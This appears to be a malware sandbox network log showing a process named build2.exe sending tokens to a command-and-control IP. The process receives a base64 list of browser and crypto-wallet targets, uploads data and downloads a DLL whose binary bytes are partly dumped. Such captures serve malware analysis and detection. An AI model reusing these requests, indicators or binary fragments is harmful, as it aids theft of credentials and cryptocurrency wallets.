2024-05-25 19:29:54 UTC	8192	IN	Data Raw: 32 35 34 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 64 69 76 69 2d 66 6f 6e 74 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c Data Ascii: 254a<link rel='stylesheet' id='divi-fonts-css' href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&subset=latin,latin-ext&display=swap' type='text/css' media='all' /><l
2024-05-25 19:29:54 UTC	1360	IN	Data Raw: 2d 63 6f 6e 74 65 6e 74 5c 2f 74 68 65 6d 65 73 5c 2f 44 69 76 69 5c 2f 69 6d 61 67 65 73 22 2c 22 62 75 69 6c 64 65 72 5f 69 6d 61 67 65 73 5f 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6e 65 73 73 6f 74 65 63 68 62 64 2e 63 6f 6d 5c 2f 77 70 2d 63 6f 6e 74 65 6e 74 5c 2f 74 68 65 6d 65 73 5c 2f 44 69 76 69 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 62 75 69 6c 64 65 72 5c 2f 69 6d 61 67 65 73 22 2c 22 65 74 5f 66 72 6f 6e 74 65 6e 64 5f 6e 6f 6e 63 65 22 3a 22 35 66 64 31 66 63 61 30 38 38 22 2c 22 73 75 62 73 63 72 69 70 74 69 6f 6e 5f 66 61 69 6c 65 64 22 3a 22 50 6c 65 61 73 65 2c 20 63 68 65 63 6b 20 74 68 65 20 66 69 65 6c 64 73 20 62 65 6c 6f 77 20 74 6f 20 6d 61 6b 65 20 73 75 72 65 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 63 6f 72 72 65 Data Ascii: -content\/themes\/Divi\/images","builder_images_uri":"https:\/\/nessotechbd.com\/wp-content\/themes\/Divi\/includes\/builder\/images","et_frontend_nonce":"5fd1fca088","subscription_failed":"Please, check the fields below to make sure you entered the corre
2024-05-25 19:29:54 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-05-25 19:29:54 UTC	331	IN	Data Raw: 31 33 66 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6e 65 73 73 6f 74 65 63 68 62 64 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 44 69 76 69 2f 6a 73 2f 63 75 73 74 6f 6d 2e 75 6e 69 66 69 65 64 2e 6a 73 3f 76 65 72 3d 34 2e 39 2e 32 22 20 69 64 3d 22 64 69 76 69 2d 63 75 73 74 6f 6d 2d 73 63 72 69 70 74 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6e 65 73 73 6f 74 65 63 68 62 64 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 44 69 76 69 2f 63 6f 72 65 2f 61 64 6d 69 6e 2f 6a 73 2f 63 Data Ascii: 13f<script type="text/javascript" src="https://nessotechbd.com/wp-content/themes/Divi/js/custom.unified.js?ver=4.9.2" id="divi-custom-script-js"></script><script type="text/javascript" src="https://nessotechbd.com/wp-content/themes/Divi/core/admin/js/c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49771	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:29:54 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAEHJJECAEGCAAAAEGIE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:29:54 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------DAEHJJECAEGCAAAAEGIEContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------DAEHJJECAEGCAAAAEGIEContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------DAEHJJECAEGCAAAAEGIECont
2024-05-25 19:29:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:29:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:29:54 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49776	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:29:56 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:29:56 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------CGHCGIIDGDAKFIEBKFCFCont
2024-05-25 19:29:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:29:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:29:56 UTC	5605	IN	Data Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49779	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:29:58 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:29:58 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------FCBFBGDBKJKECAAKKFHDCont
2024-05-25 19:29:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:29:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:29:59 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49785	188.114.96.3	443	4956	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:01 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-05-25 19:30:01 UTC	912	IN	HTTP/1.1 429 Too Many Requests Date: Sat, 25 May 2024 19:30:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jVHW%2BuDMPNg%2BTuV8Gkn1awMRTHC4BnDnvGMGByaOk73bYs2TZ7TDg5VzfVfopGYJV2Tp9HXJrNJBp4%2FqrQmheNcOpPqwBndSWzdJTnjNaeNY7GuoPb9lGvmPqN0y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8897f0061dc47286-EWR alt-svc: h3=":443"; ma=86400
2024-05-25 19:30:01 UTC	457	IN	Data Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 36 39 30 31 30 63 30 35 31 39 32 39 35 62 30 30 31 39 34 37 30 34 30 63 35 36 31 61 31 63 30 62 30 33 30 63 30 61 Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#69010c0519295b001947040c561a1c0b030c0a
2024-05-25 19:30:01 UTC	473	IN	Data Raw: d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 38 31 65 39 65 34 65 64 66 31 63 31 62 33 65 38 66 31 61 66 66 34 65 30 62 65 66 32 66 34 65 33 65 62 65 34 65 32 66 35 62 63 62 33 65 38 66 31 61 66 66 34 65 30 22 3e Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#81e9e4edf1c1b3e8f1aff4e0bef2f4e3ebe4e2f5bcb3e8f1aff4e0">
2024-05-25 19:30:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49783	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:01 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJEBGHIEBFIJKECBKFHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 6437 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:30:01 UTC	6437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------HJEBGHIEBFIJKECBKFHDCont
2024-05-25 19:30:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:30:01 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49786	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:01 UTC	194	OUT	GET /sqls.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:30:02 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:01 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Fri, 24 May 2024 10:18:21 GMT Connection: close ETag: "6650696d-258600" Accept-Ranges: bytes
2024-05-25 19:30:02 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-05-25 19:30:02 UTC	16384	IN	Data Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: X~e!*FW\|>\|L1146
2024-05-25 19:30:02 UTC	16384	IN	Data Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
2024-05-25 19:30:02 UTC	16384	IN	Data Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08 Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
